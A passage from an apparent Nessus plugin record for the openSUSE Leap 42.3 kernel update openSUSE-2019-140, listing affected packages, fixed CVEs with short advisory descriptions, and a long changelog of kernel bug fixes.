"p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-docs-html", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:kernel-docs-pdf", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo"], "id": "OPENSUSE-2019-140.NASL", "href": "https://www.tenable.com/plugins/nessus/121633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-140.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121633);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-1120\", \"CVE-2018-16862\", \"CVE-2018-16884\", \"CVE-2018-19407\", \"CVE-2018-19824\", \"CVE-2018-19985\", \"CVE-2018-20169\", \"CVE-2018-9568\", \"CVE-2019-3459\", \"CVE-2019-3460\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2019-140)\");\n script_summary(english:\"Check for the openSUSE-2019-140 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.3 Linux kernel was updated to 4.4.172 to receive\nvarious security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2019-3459,CVE-2019-3460: Two remote information leak\n vulnerabilities in the Bluetooth stack were fixed that\n could potentially leak kernel information (bsc#1120758)\n\n - CVE-2018-19407: The vcpu_scan_ioapic function in\n arch/x86/kvm/x86.c allowed local users to cause a denial\n of service (NULL pointer dereference and BUG) via\n crafted system calls that reach a situation where ioapic\n is uninitialized (bnc#1116841).\n\n - CVE-2018-19985: The function hso_probe read if_num from\n the USB device (as an u8) and used it without a length\n check to index an array, resulting in an OOB memory read\n in hso_probe or hso _get_config_data that could be used\n by local attackers (bnc#1120743).\n\n - CVE-2018-1120: By mmap()ing a FUSE-backed file onto a\n process's memory containing command line arguments (or\n environment strings), an attacker can cause utilities\n from psutils or procps (such as ps, w) or any other\n program which made a read() call to the\n /proc/<pid>/cmdline (or /proc/<pid>/environ) files to\n block indefinitely (denial of service) or for some\n controlled time (as a synchronization primitive for\n other attacks) (bnc#1087082).\n\n - CVE-2018-16884: NFS41+ shares mounted in different\n network namespaces at the same time can make\n bc_svc_process() use wrong back-channel IDs and cause a\n use-after-free vulnerability. Thus a malicious container\n user can cause a host kernel memory corruption and a\n system panic. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out (bnc#1119946).\n\n - CVE-2018-20169: The USB subsystem mishandled size checks\n during the reading of an extra descriptor, related to\n __usb_get_extra_descriptor in drivers/usb/core/usb.c\n (bnc#1119714).\n\n - CVE-2018-9568: In sk_clone_lock of sock.c, there is a\n possible memory corruption due to type confusion. This\n could lead to local escalation of privilege with no\n additional execution privileges needed. User interaction\n is not needed for exploitation. (bnc#1118319).\n\n - CVE-2018-16862: A security flaw was found in a way that\n the cleancache subsystem clears an inode after the final\n file truncation (removal). The new file created with the\n same inode may contain leftover pages from cleancache\n and the old file data instead of the new one\n (bnc#1117186).\n\n - CVE-2018-19824: A local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c\n (bnc#1118152).\n\nThe following non-security bugs were fixed :\n\n - 9p/net: put a lower bound on msize (bnc#1012382).\n\n - ACPI/IORT: Fix iort_get_platform_device_domain()\n uninitialized pointer value (bsc#1121239).\n\n - acpi/nfit: Block function zero DSMs (bsc#1123321).\n\n - acpi/nfit: Fix command-supported detection\n (bsc#1123323).\n\n - acpi/nfit, x86/mce: Handle only uncorrectable machine\n checks (bsc#1114648).\n\n - acpi/nfit, x86/mce: Validate a MCE's address before\n using it (bsc#1114648).\n\n - acpi/power: Skip duplicate power resource references in\n _PRx (bnc#1012382).\n\n - acpi/processor: Fix the return value of\n acpi_processor_ids_walk() (git fixes (acpi)).\n\n - aio: fix spectre gadget in lookup_ioctx (bnc#1012382).\n\n - aio: hold an extra file reference over AIO read/write\n operations (bsc#1116027).\n\n - alsa: ac97: Fix incorrect bit shift at AC97-SPSA control\n write (bnc#1012382).\n\n - alsa: bebob: fix model-id of unit for Apogee Ensemble\n (bnc#1012382).\n\n - alsa: control: Fix race between adding and removing a\n user element (bnc#1012382).\n\n - alsa: cs46xx: Potential NULL dereference in probe\n (bnc#1012382).\n\n - alsa: emu10k1: Fix potential Spectre v1 vulnerabilities\n (bnc#1012382).\n\n - alsa: emux: Fix potential Spectre v1 vulnerabilities\n (bnc#1012382).\n\n - alsa: hda: add mute LED support for HP EliteBook 840 G4\n (bnc#1012382).\n\n - alsa: hda: Add support for AMD Stoney Ridge\n (bnc#1012382).\n\n - alsa: hda/realtek - Disable headset Mic VREF for headset\n mode of ALC225 (bnc#1012382).\n\n - alsa: hda/tegra: clear pending irq handlers\n (bnc#1012382).\n\n - alsa: isa/wavefront: prevent some out of bound writes\n (bnc#1012382).\n\n - alsa: pcm: Call snd_pcm_unlink() conditionally at\n closing (bnc#1012382).\n\n - alsa: pcm: Fix interval evaluation with openmin/max\n (bnc#1012382).\n\n - alsa: pcm: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - alsa: pcm: Fix starvation on down_write_nonblock()\n (bnc#1012382).\n\n - alsa: pcm: remove SNDRV_PCM_IOCTL1_INFO internal command\n (bnc#1012382).\n\n - alsa: rme9652: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - alsa: sparc: Fix invalid snd_free_pages() at error path\n (bnc#1012382).\n\n - alsa: trident: Suppress gcc string warning\n (bnc#1012382).\n\n - alsa: usb-audio: Avoid access before bLength check in\n build_audio_procunit() (bnc#1012382).\n\n - alsa: usb-audio: Fix an out-of-bound read in\n create_composite_quirks (bnc#1012382).\n\n - alsa: wss: Fix invalid snd_free_pages() at error path\n (bnc#1012382).\n\n - arc: change defconfig defaults to ARCv2 (bnc#1012382).\n\n - arc: [devboards] Add support of NFSv3 ACL (bnc#1012382).\n\n - arc: io.h: Implement reads(x)()/writes(x)()\n (bnc#1012382).\n\n - arm64: Do not trap host pointer auth use to EL2\n (bnc#1012382).\n\n - arm64/kvm: consistently handle host HCR_EL2 flags\n (bnc#1012382).\n\n - arm64: perf: set suppress_bind_attrs flag to true\n (bnc#1012382).\n\n - arm64: remove no-op -p linker flag (bnc#1012382).\n\n - arm: 8814/1: mm: improve/fix ARM v7_dma_inv_range()\n unaligned address handling (bnc#1012382).\n\n - arm: imx: update the cpu power up timing setting on\n i.mx6sx (bnc#1012382).\n\n - arm: kvm: fix building with gcc-8 (bsc#1121241).\n\n - arm: OMAP1: ams-delta: Fix possible use of uninitialized\n field (bnc#1012382).\n\n - arm: OMAP2+: prm44xx: Fix section annotation on\n omap44xx_prm_enable_io_wakeup (bnc#1012382).\n\n - ASoC: dapm: Recalculate audio map forcely when card\n instantiated (bnc#1012382).\n\n - ASoC: omap-dmic: Add pm_qos handling to avoid overruns\n with CPU_IDLE (bnc#1012382).\n\n - ASoC: omap-mcpdm: Add pm_qos handling to avoid\n under/overruns with CPU_IDLE (bnc#1012382).\n\n - ata: Fix racy link clearance (bsc#1107866).\n\n - ath10k: fix kernel panic due to race in accessing arvif\n list (bnc#1012382).\n\n - ax25: fix a use-after-free in ax25_fillin_cb()\n (bnc#1012382).\n\n - b43: Fix error in cordic routine (bnc#1012382).\n\n - batman-adv: Expand merged fragment buffer for full\n packet (bnc#1012382).\n\n - bfs: add sanity check at bfs_fill_super() (bnc#1012382).\n\n - block/loop: Use global lock for ioctl() operation\n (bnc#1012382).\n\n - block/swim3: Fix -EBUSY error when re-opening device\n after unmount (Git-fixes).\n\n - bnx2x: Assign unique DMAE channel number for FW DMAE\n transactions (bnc#1012382).\n\n - bonding: fix 802.3ad state sent to partner when\n unbinding slave (bnc#1012382).\n\n - bpf: fix check of allowed specifiers in bpf_trace_printk\n (bnc#1012382).\n\n - bpf: support 8-byte metafield access (bnc#1012382).\n\n - bpf, trace: check event type in bpf_perf_event_read\n (bsc#1119970).\n\n - bpf, trace: use READ_ONCE for retrieving file ptr\n (bsc#1119967).\n\n - bpf/verifier: Add spi variable to check_stack_write()\n (bnc#1012382).\n\n - bpf/verifier: Pass instruction index to\n check_mem_access() and check_xadd() (bnc#1012382).\n\n - btrfs: Always try all copies when reading extent buffers\n (bnc#1012382).\n\n - btrfs: ensure path name is null terminated at\n btrfs_control_ioctl (bnc#1012382).\n\n - btrfs: Fix memory barriers usage with device stats\n counters (git-fixes).\n\n - btrfs: fix use-after-free when dumping free space\n (bnc#1012382).\n\n - btrfs: Handle error from btrfs_uuid_tree_rem call in\n _btrfs_ioctl_set_received_subvol (git-fixes).\n\n - btrfs: release metadata before running delayed refs\n (bnc#1012382).\n\n - btrfs: send, fix infinite loop due to directory rename\n dependencies (bnc#1012382).\n\n - btrfs: tree-checker: Check level for leaves and nodes\n (bnc#1012382).\n\n - btrfs: tree-checker: Do not check max block group size\n as current max chunk size limit is unreliable (fixes for\n bnc#1012382 bsc#1102875 bsc#1102877 bsc#1102879\n bsc#1102882 bsc#1102896).\n\n - btrfs: tree-checker: Fix misleading group system\n information (bnc#1012382).\n\n - btrfs: tree-check: reduce stack consumption in\n check_dir_item (bnc#1012382).\n\n - btrfs: validate type when reading a chunk (bnc#1012382).\n\n - btrfs: wait on ordered extents on abort cleanup\n (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): Do not crash the kernel\n if can_priv::echo_skb is accessed out of bounds\n (bnc#1012382).\n\n - can: dev: can_get_echo_skb(): factor out non sending\n code to __can_get_echo_skb() (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): print error message, if\n trying to echo non existing skb (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): replace struct can_frame\n by canfd_frame to access frame length (bnc#1012382).\n\n - can: gw: ensure DLC boundaries after CAN frame\n modification (bnc#1012382).\n\n - can: rcar_can: Fix erroneous registration (bnc#1012382).\n\n - cdc-acm: fix abnormal DATA RX issue for Mediatek\n Preloader (bnc#1012382).\n\n - ceph: do not update importing cap's mseq when handing\n cap export (bsc#1121275).\n\n - checkstack.pl: fix for aarch64 (bnc#1012382).\n\n - cifs: Do not hide EINTR after sending network packets\n (bnc#1012382).\n\n - cifs: Fix error mapping for SMB2_LOCK command which\n caused OFD lock problem (bnc#1012382).\n\n - cifs: Fix potential OOB access of lock element array\n (bnc#1012382).\n\n - cifs: Fix separator when building path from dentry\n (bnc#1012382).\n\n - cifs: In Kconfig CONFIG_CIFS_POSIX needs depends on\n legacy (insecure cifs) (bnc#1012382).\n\n - clk: imx6q: reset exclusive gates on init (bnc#1012382).\n\n - clk: mmp: Off by one in mmp_clk_add() (bnc#1012382).\n\n - cpufeature: avoid warning when compiling with clang\n (Git-fixes).\n\n - cpufreq: imx6q: add return value check for voltage scale\n (bnc#1012382).\n\n - crypto: authencesn - Avoid twice completion call in\n decrypt path (bnc#1012382).\n\n - crypto: authenc - fix parsing key with misaligned\n rta_len (bnc#1012382).\n\n - crypto: cts - fix crash on short inputs (bnc#1012382).\n\n - crypto: user - support incremental algorithm dumps\n (bsc#1120902).\n\n - crypto: x86/chacha20 - avoid sleeping with preemption\n disabled (bnc#1012382).\n\n - cw1200: Do not leak memory if krealloc failes\n (bnc#1012382).\n\n - debugobjects: avoid recursive calls with kmemleak\n (bnc#1012382).\n\n - Disable MSI also when pcie-octeon.pcie_disable on\n (bnc#1012382).\n\n - disable stringop truncation warnings for now\n (bnc#1012382).\n\n - dlm: fixed memory leaks after failed ls_remove_names\n allocation (bnc#1012382).\n\n - dlm: lost put_lkb on error path in receive_convert() and\n receive_unlock() (bnc#1012382).\n\n - dlm: memory leaks on error path in dlm_user_request()\n (bnc#1012382).\n\n - dlm: possible memory leak on error path in create_lkb()\n (bnc#1012382).\n\n - dmaengine: at_hdmac: fix memory leak in at_dma_xlate()\n (bnc#1012382).\n\n - dmaengine: at_hdmac: fix module unloading (bnc#1012382).\n\n - dm cache metadata: ignore hints array being too small\n during resize (Git-fixes).\n\n - dm crypt: add cryptographic data integrity protection\n (authenticated encryption) (Git-fixes).\n\n - dm crypt: factor IV constructor out to separate function\n (Git-fixes).\n\n - dm crypt: fix crash by adding missing check for auth key\n size (git-fixes).\n\n - dm crypt: fix error return code in crypt_ctr()\n (git-fixes).\n\n - dm crypt: fix memory leak in crypt_ctr_cipher_old()\n (git-fixes).\n\n - dm crypt: introduce new format of cipher with 'capi:'\n prefix (Git-fixes).\n\n - dm crypt: wipe kernel key copy after IV initialization\n (Git-fixes).\n\n - dm: do not allow readahead to limit IO size (git fixes\n (readahead)).\n\n - dm kcopyd: Fix bug causing workqueue stalls\n (bnc#1012382).\n\n - dm-multipath: do not assign cmd_flags in setup_clone()\n (bsc#1103156).\n\n - dm snapshot: Fix excessive memory usage and workqueue\n stalls (bnc#1012382).\n\n - dm thin: stop no_space_timeout worker when switching to\n write-mode (Git-fixes).\n\n - drivers: hv: vmbus: check the creation_status in\n vmbus_establish_gpadl() (bsc#1104098).\n\n - drivers: hv: vmbus: Return -EINVAL for the sys files for\n unopened channels (bnc#1012382).\n\n - drivers/sbus/char: add of_node_put() (bnc#1012382).\n\n - drivers/tty: add missing of_node_put() (bnc#1012382).\n\n - drm/ast: change resolution may cause screen blurred\n (bnc#1012382).\n\n - drm/ast: fixed cursor may disappear sometimes\n (bnc#1012382).\n\n - drm/ast: fixed reading monitor EDID not stable issue\n (bnc#1012382).\n\n - drm/ast: Fix incorrect free on ioregs (bsc#1106929)\n\n - drm/fb-helper: Ignore the value of\n fb_var_screeninfo.pixclock (bsc#1106929)\n\n - drm/ioctl: Fix Spectre v1 vulnerabilities (bnc#1012382).\n\n - drm/msm: Grab a vblank reference when waiting for\n commit_done (bnc#1012382).\n\n - drm: rcar-du: Fix external clock error checks\n (bsc#1106929)\n\n - drm: rcar-du: Fix vblank initialization (bsc#1106929)\n\n - e1000e: allow non-monotonic SYSTIM readings\n (bnc#1012382).\n\n - EDAC: Raise the maximum number of memory controllers\n (bsc#1120722).\n\n - efi/libstub/arm64: Use hidden attribute for struct\n screen_info reference (bsc#1122650).\n\n - exec: avoid gcc-8 warning for get_task_comm\n (bnc#1012382).\n\n - exportfs: do not read dentry after free (bnc#1012382).\n\n - ext2: fix potential use after free (bnc#1012382).\n\n - ext4: fix a potential fiemap/page fault deadlock w/\n inline_data (bnc#1012382).\n\n - ext4: Fix crash during online resizing (bsc#1122779).\n\n - ext4: fix EXT4_IOC_GROUP_ADD ioctl (bnc#1012382).\n\n - ext4: fix possible use after free in ext4_quota_enable\n (bnc#1012382).\n\n - ext4: force inode writes when nfsd calls\n commit_metadata() (bnc#1012382).\n\n - ext4: missing unlock/put_page() in\n ext4_try_to_write_inline_data() (bnc#1012382).\n\n - f2fs: Add sanity_check_inode() function (bnc#1012382).\n\n - f2fs: avoid unneeded loop in build_sit_entries\n (bnc#1012382).\n\n - f2fs: check blkaddr more accuratly before issue a bio\n (bnc#1012382).\n\n - f2fs: clean up argument of recover_data (bnc#1012382).\n\n - f2fs: clean up with is_valid_blkaddr() (bnc#1012382).\n\n - f2fs: detect wrong layout (bnc#1012382).\n\n - f2fs: enhance sanity_check_raw_super() to avoid\n potential overflow (bnc#1012382).\n\n - f2fs: factor out fsync inode entry operations\n (bnc#1012382).\n\n - f2fs: fix inode cache leak (bnc#1012382).\n\n - f2fs: fix invalid memory access (bnc#1012382).\n\n - f2fs: fix missing up_read (bnc#1012382).\n\n - f2fs: fix to avoid reading out encrypted data in page\n cache (bnc#1012382).\n\n - f2fs: fix to convert inline directory correctly\n (bnc#1012382).\n\n - f2fs: fix to determine start_cp_addr by sbi->cur_cp_pack\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with block address in main\n area (bnc#1012382).\n\n - f2fs: fix to do sanity check with block address in main\n area v2 (bnc#1012382).\n\n - f2fs: fix to do sanity check with cp_pack_start_sum\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with node footer and\n iblocks (bnc#1012382).\n\n - f2fs: fix to do sanity check with reserved blkaddr of\n inline inode (bnc#1012382).\n\n - f2fs: fix to do sanity check with secs_per_zone\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with user_block_count\n (bnc#1012382).\n\n - f2fs: fix validation of the block count in\n sanity_check_raw_super (bnc#1012382).\n\n - f2fs: free meta pages if sanity check for ckpt is failed\n (bnc#1012382).\n\n - f2fs: give -EINVAL for norecovery and rw mount\n (bnc#1012382).\n\n - f2fs: introduce and spread verify_blkaddr (bnc#1012382).\n\n - f2fs: introduce get_checkpoint_version for cleanup\n (bnc#1012382).\n\n - f2fs: move sanity checking of cp into\n get_valid_checkpoint (bnc#1012382).\n\n - f2fs: not allow to write illegal blkaddr (bnc#1012382).\n\n - f2fs: put directory inodes before checkpoint in\n roll-forward recovery (bnc#1012382).\n\n - f2fs: remove an obsolete variable (bnc#1012382).\n\n - f2fs: return error during fill_super (bnc#1012382).\n\n - f2fs: sanity check on sit entry (bnc#1012382).\n\n - f2fs: use crc and cp version to determine roll-forward\n recovery (bnc#1012382).\n\n - fbdev: fbcon: Fix unregister crash when more than one\n framebuffer (bsc#1106929)\n\n - fbdev: fbmem: behave better with small rotated displays\n and many CPUs (bsc#1106929)\n\n - fix fragmentation series\n\n - Fix problem with sharetransport= and NFSv4\n (bsc#1114893).\n\n - floppy: fix race condition in __floppy_read_block_0()\n (Git-fixes).\n\n - fork: record start_time late (bnc#1012382).\n\n - fscache, cachefiles: remove redundant variable 'cache'\n (bnc#1012382).\n\n - fscache: Fix race in fscache_op_complete() due to split\n atomic_sub & read (Git-fixes).\n\n - fscache: Pass the correct cancelled indications to\n fscache_op_complete() (Git-fixes).\n\n - genwqe: Fix size check (bnc#1012382).\n\n - gfs2: Do not leave s_fs_info pointing to freed memory in\n init_sbd (bnc#1012382).\n\n - gfs2: Fix loop in gfs2_rbm_find (bnc#1012382).\n\n - git_sort.py: Remove non-existent remote tj/libata\n\n - gpiolib: Fix return value of gpio_to_desc() stub if\n !GPIOLIB (Git-fixes).\n\n - gpio: max7301: fix driver for use with CONFIG_VMAP_STACK\n (bnc#1012382).\n\n - gro_cell: add napi_disable in gro_cells_destroy\n (bnc#1012382).\n\n - hfs: do not free node before using (bnc#1012382).\n\n - hfsplus: do not free node before using (bnc#1012382).\n\n - hpwdt add dynamic debugging (bsc#1114417).\n\n - hpwdt calculate reload value on each use (bsc#1114417).\n\n - hugetlbfs: fix bug in pgoff overflow checking\n (bnc#1012382).\n\n - hwmon: (ina2xx) Fix current value calculation\n (bnc#1012382).\n\n - hwmon: (w83795) temp4_type has writable permission\n (bnc#1012382).\n\n - hwpoison, memory_hotplug: allow hwpoisoned pages to be\n offlined (bnc#1116336).\n\n - i2c: axxia: properly handle master timeout\n (bnc#1012382).\n\n - i2c: dev: prevent adapter retries and timeout being set\n as minus value (bnc#1012382).\n\n - i2c: scmi: Fix probe error on devices with an empty\n SMB0001 ACPI device node (bnc#1012382).\n\n - ib/hfi1: Fix an out-of-bounds access in get_hw_stats ().\n\n - ibmveth: Do not process frames after calling\n napi_reschedule (bcs#1123357).\n\n - ibmveth: fix DMA unmap error in ibmveth_xmit_start error\n path (bnc#1012382).\n\n - ibmvnic: Add ethtool private flag for driver-defined\n queue limits (bsc#1121726).\n\n - ibmvnic: Convert reset work item mutex to spin lock ().\n\n - ibmvnic: Fix non-atomic memory allocation in IRQ context\n ().\n\n - ibmvnic: Increase maximum queue size limit\n (bsc#1121726).\n\n - ibmvnic: Introduce driver limits for ring sizes\n (bsc#1121726).\n\n - ide: pmac: add of_node_put() (bnc#1012382).\n\n - ieee802154: lowpan_header_create check must check daddr\n (bnc#1012382).\n\n - input: elan_i2c - add ACPI ID for Lenovo IdeaPad\n 330-15ARR (bnc#1012382).\n\n - input: elan_i2c - add ACPI ID for touchpad in ASUS\n Aspire F5-573G (bnc#1012382).\n\n - input: elan_i2c - add ELAN0620 to the ACPI table\n (bnc#1012382).\n\n - input: elan_i2c - add support for ELAN0621 touchpad\n (bnc#1012382).\n\n - input: matrix_keypad - check for errors from\n of_get_named_gpio() (bnc#1012382).\n\n - input: omap-keypad - fix idle configuration to not block\n SoC idle states (bnc#1012382).\n\n - input: omap-keypad - fix keyboard debounce configuration\n (bnc#1012382).\n\n - input: restore EV_ABS ABS_RESERVED (bnc#1012382).\n\n - input: xpad - add GPD Win 2 Controller USB IDs\n (bnc#1012382).\n\n - input: xpad - add Mad Catz FightStick TE 2 VID/PID\n (bnc#1012382).\n\n - input: xpad - add more third-party controllers\n (bnc#1012382).\n\n - input: xpad - add PDP device id 0x02a4 (bnc#1012382).\n\n - input: xpad - add product ID for Xbox One S pad\n (bnc#1012382).\n\n - input: xpad - add support for PDP Xbox One controllers\n (bnc#1012382).\n\n - input: xpad - add support for Xbox1 PDP Camo series\n gamepad (bnc#1012382).\n\n - input: xpad - add USB IDs for Mad Catz Brawlstick and\n Razer Sabertooth (bnc#1012382).\n\n - input: xpad - avoid using __set_bit() for capabilities\n (bnc#1012382).\n\n - input: xpad - constify usb_device_id (bnc#1012382).\n\n - input: xpad - correctly sort vendor id's (bnc#1012382).\n\n - input: xpad - correct xbox one pad device name\n (bnc#1012382).\n\n - input: xpad - do not depend on endpoint order\n (bnc#1012382).\n\n - input: xpad - fix GPD Win 2 controller name\n (bnc#1012382).\n\n - input: xpad - fix PowerA init quirk for some gamepad\n models (bnc#1012382).\n\n - input: xpad - fix rumble on Xbox One controllers with\n 2015 firmware (bnc#1012382).\n\n - input: xpad - fix some coding style issues\n (bnc#1012382).\n\n - input: xpad - fix stuck mode button on Xbox One S pad\n (bnc#1012382).\n\n - input: xpad - fix Xbox One rumble stopping after 2.5\n secs (bnc#1012382).\n\n - input: xpad - handle 'present' and 'gone' correctly\n (bnc#1012382).\n\n - input: xpad - move reporting xbox one home button to\n common function (bnc#1012382).\n\n - input: xpad - power off wireless 360 controllers on\n suspend (bnc#1012382).\n\n - input: xpad - prevent spurious input from wired Xbox 360\n controllers (bnc#1012382).\n\n - input: xpad - quirk all PDP Xbox One gamepads\n (bnc#1012382).\n\n - input: xpad - remove spurious events of wireless xpad\n 360 controller (bnc#1012382).\n\n - input: xpad - remove unused function (bnc#1012382).\n\n - input: xpad - restore LED state after device resume\n (bnc#1012382).\n\n - input: xpad - simplify error condition in init_output\n (bnc#1012382).\n\n - input: xpad - sort supported devices by USB ID\n (bnc#1012382).\n\n - input: xpad - support some quirky Xbox One pads\n (bnc#1012382).\n\n - input: xpad - sync supported devices with 360Controller\n (bnc#1012382).\n\n - input: xpad - sync supported devices with XBCD\n (bnc#1012382).\n\n - input: xpad - sync supported devices with xboxdrv\n (bnc#1012382).\n\n - input: xpad - update Xbox One Force Feedback Support\n (bnc#1012382).\n\n - input: xpad - use LED API when identifying wireless\n controllers (bnc#1012382).\n\n - input: xpad - validate USB endpoint type during probe\n (bnc#1012382).\n\n - input: xpad - workaround dead irq_out after suspend/\n resume (bnc#1012382).\n\n - input: xpad - xbox one elite controller support\n (bnc#1012382).\n\n - intel_th: msu: Fix an off-by-one in attribute store\n (bnc#1012382).\n\n - iommu/amd: Call free_iova_fast with pfn in map_sg\n (bsc#1106105).\n\n - iommu/amd: Fix amd_iommu=force_isolation (bsc#1106105).\n\n - iommu/amd: Fix IOMMU page flush when detach device from\n a domain (bsc#1106105).\n\n - iommu/amd: Unmap all mapped pages in error path of\n map_sg (bsc#1106105).\n\n - iommu/vt-d: Fix memory leak in\n intel_iommu_put_resv_regions() (bsc#1106105).\n\n - iommu/vt-d: Handle domain agaw being less than iommu\n agaw (bsc#1106105).\n\n - ip6mr: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - ipmi:ssif: Fix handling of multi-part return messages\n (bnc#1012382).\n\n - ip: on queued skb use skb_header_pointer instead of\n pskb_may_pull (bnc#1012382).\n\n - ip_tunnel: Fix name string concatenate in\n __ip_tunnel_create() (bnc#1012382).\n\n - ipv4: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - ipv4: ipv6: netfilter: Adjust the frag mem limit when\n truesize changes (bsc#1110286).\n\n - ipv6: Check available headroom in ip6_xmit() even\n without options (bnc#1012382).\n\n - ipv6: Consider sk_bound_dev_if when binding a socket to\n a v4 mapped address (bnc#1012382).\n\n - ipv6: explicitly initialize udp6_addr in\n udp_sock_create6() (bnc#1012382).\n\n - ipv6: fix kernel-infoleak in ipv6_local_error()\n (bnc#1012382).\n\n - ipv6: Take rcu_read_lock in __inet6_bind for mapped\n addresses (bnc#1012382).\n\n - isdn: fix kernel-infoleak in capi_unlocked_ioctl\n (bnc#1012382).\n\n - iser: set sector for ambiguous mr status errors\n (bnc#1012382).\n\n - iwlwifi: mvm: fix regulatory domain update when the\n firmware starts (bnc#1012382).\n\n - iwlwifi: mvm: support sta_statistics() even on older\n firmware (bnc#1012382).\n\n - ixgbe: Add function for checking to see if we can reuse\n page (bsc#1100105).\n\n - ixgbe: Add support for build_skb (bsc#1100105).\n\n - ixgbe: Add support for padding packet (bsc#1100105).\n\n - ixgbe: Break out Rx buffer page management\n (bsc#1100105).\n\n - ixgbe: Fix output from ixgbe_dump (bsc#1100105).\n\n - ixgbe: fix possible race in reset subtask (bsc#1101557).\n\n - ixgbe: Make use of order 1 pages and 3K buffers\n independent of FCoE (bsc#1100105).\n\n - ixgbe: Only DMA sync frame length (bsc#1100105).\n\n - ixgbe: recognize 1000BaseLX SFP modules as 1Gbps\n (bnc#1012382).\n\n - ixgbe: Refactor queue disable logic to take completion\n time into account (bsc#1101557).\n\n - ixgbe: Reorder Tx/Rx shutdown to reduce time needed to\n stop device (bsc#1101557).\n\n - ixgbe: Update code to better handle incrementing page\n count (bsc#1100105).\n\n - ixgbe: Update driver to make use of DMA attributes in Rx\n path (bsc#1100105).\n\n - ixgbe: Use length to determine if descriptor is done\n (bsc#1100105).\n\n - jffs2: Fix use of uninitialized delayed_work, lockdep\n breakage (bnc#1012382).\n\n - kabi: hwpoison, memory_hotplug: allow hwpoisoned pages\n to be offlined (bnc#1116336).\n\n - kabi: reorder new slabinfo fields in struct\n kmem_cache_node (bnc#1116653).\n\n - kbuild: suppress packed-not-aligned warning for default\n setting only (bnc#1012382).\n\n - kconfig: fix file name and line number of\n warn_ignored_character() (bnc#1012382).\n\n - kconfig: fix memory leak when EOF is encountered in\n quotation (bnc#1012382).\n\n - kdb: use memmove instead of overlapping memcpy\n (bnc#1012382).\n\n - kdb: Use strscpy with destination buffer size\n (bnc#1012382).\n\n - kernfs: Replace strncpy with memcpy (bnc#1012382).\n\n - kgdboc: fix KASAN global-out-of-bounds bug in\n param_set_kgdboc_var() (bnc#1012382).\n\n - kgdboc: Fix restrict error (bnc#1012382).\n\n - kgdboc: Fix warning with module build (bnc#1012382).\n\n - kobject: Replace strncpy with memcpy (bnc#1012382).\n\n - kvm/arm64: Fix caching of host MDCR_EL2 value\n (bsc#1121242).\n\n - kvm/arm: Restore banked registers and physical timer\n access on hyp_panic() (bsc#1121240).\n\n - kvm/mmu: Fix race in emulated page table writes\n (bnc#1012382).\n\n - kvm/nVMX: Eliminate vmcs02 pool (bnc#1012382).\n\n - kvm/nVMX: mark vmcs12 pages dirty on L2 exit\n (bnc#1012382).\n\n - kvm/PPC: Move and undef TRACE_INCLUDE_PATH/FILE\n (bnc#1012382).\n\n - kvm/svm: Allow direct access to MSR_IA32_SPEC_CTRL\n (bnc#1012382 bsc#1068032).\n\n - kvm/svm: Ensure an IBPB on all affected CPUs when\n freeing a vmcb (bsc#1114648).\n\n - kvm/VMX: Allow direct access to MSR_IA32_SPEC_CTRL\n (bnc#1012382 bsc#1068032 bsc#1096242 bsc#1096281).\n\n - kvm/VMX: Emulate MSR_IA32_ARCH_CAPABILITIES\n (bnc#1012382).\n\n - kvm/VMX: introduce alloc_loaded_vmcs (bnc#1012382).\n\n - kvm/VMX: make MSR bitmaps per-VCPU (bnc#1012382).\n\n - kvm/x86: Add IBPB support (bnc#1012382 bsc#1068032\n bsc#1068032).\n\n - kvm/x86: fix empty-body warnings (bnc#1012382).\n\n - kvm/x86: Remove indirect MSR op calls from SPEC_CTRL\n (bnc#1012382).\n\n - kvm/x86: Use jmp to invoke kvm_spurious_fault() from\n .fixup (bnc#1012382).\n\n - leds: call led_pwm_set() in leds-pwm to enforce default\n LED_OFF (bnc#1012382).\n\n - leds: leds-gpio: Fix return value check in\n create_gpio_led() (bnc#1012382).\n\n - leds: turn off the LED and wait for 